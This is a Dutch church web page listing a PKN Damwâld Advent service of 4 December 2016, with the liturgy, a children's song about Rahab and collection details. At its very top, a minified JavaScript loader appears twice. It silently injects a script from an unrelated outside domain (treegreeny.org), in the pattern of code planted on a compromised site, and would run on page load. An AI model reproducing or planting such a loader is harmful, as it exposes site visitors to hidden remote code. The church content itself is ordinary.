;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 4 december 2016 9:30 uur - PKN Damwâld
zondag 4 december 2016
09:30 uur
2 e Advent / KingKids kerstproject / Koffie na de dienst

Kerkdienst zondag 4 december 2016 9:30 uur

vg_-01

Informatie

Voorganger:Ds. G. Timmer
Organist:Jaap van der Horn
Mededeling:2 e Advent / KingKids kerstproject / Koffie na de dienst
Liturgie
Lied voor de dienst Gezang 117: 1 en 5
Welkom en mededelingen
We zingen: Psalm 62: 1, 4 en 5
Stil gebed, bemoediging en groet .
Aansteken van de eerste Adventskaars
Het licht van Jezus,
straalt Zijn spoor,
twee vlammen geven
vrede door.
Lied van Advent Gezang 126: 1, 2 en 3
Gebed .
Project Kingkids
- Vertelling van het verhaal van Rachab
- Projectlied
BELOFTE VAN TROUW

Als Rachab verspieders onderdak geeft,
zij vluchten weg met het koord dat zij heeft,
dan vraagt zij hen ook: beloof mij nu gauw,
geef mij jullie woord van trouw.

De Messias komt, want beloofd is beloofd,
de Messias komt, want beloofd is beloofd.
Vertrouw steeds op Hem, wees blij en geloof:
God zal doen wat Hij heeft beloofd.

En zo kreeg Rachab haar plaats in Gods plan.
Van Gods grootheid, daar getuigde zij van.
Hoe wonderlijk is de weg die Hij koos,
ja Zijn trouw is grenzeloos.

De Messias komt, want beloofd is beloofd,
de Messias komt, want beloofd is beloofd.
Vertrouw steeds op Hem, wees blij en geloof:
God zal doen wat Hij heeft beloofd.

- Kinderen gaan naar het Skûlplak
We lezen: Jozua 2: 8-14 en Hebreeën 11: 24-3
We zingen: Psalm 87: 1, 2, 3 en 4
. Verkondiging: Rachab
We zingen: ELB 362: 1, 2 en 3
Apostolische geloofsbelijdenis
We zingen: Elb 362 : 4 en 5
Dankgebed en voorbeden .
Collecte
slotlied ELB 364: 1, 2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Stichting ORA

Noord-Korea is zo goed als afgesloten van de buitenwereld. Miljoenen mensen lijden daar dagelijks honger. Ondervoeding en eenzijdige voeding leiden tot gezondheidsproblemen. ORA ondersteunt zes bakkerijen in Noord-Korea. Deze bakken zes dagen per week gratis broodjes voor schoolkinderen en voor kinderen in gezinnen en weeshuizen. Deze collecte is bestemd voor de aankoop van grondstoffen voor het bakken van de broden. Zo krijgen hongerige kinderen in ieder geval één maaltijd per dag. Helpt u mee?

Tweede collecte: Kerk
Uitganscollecte: Kerk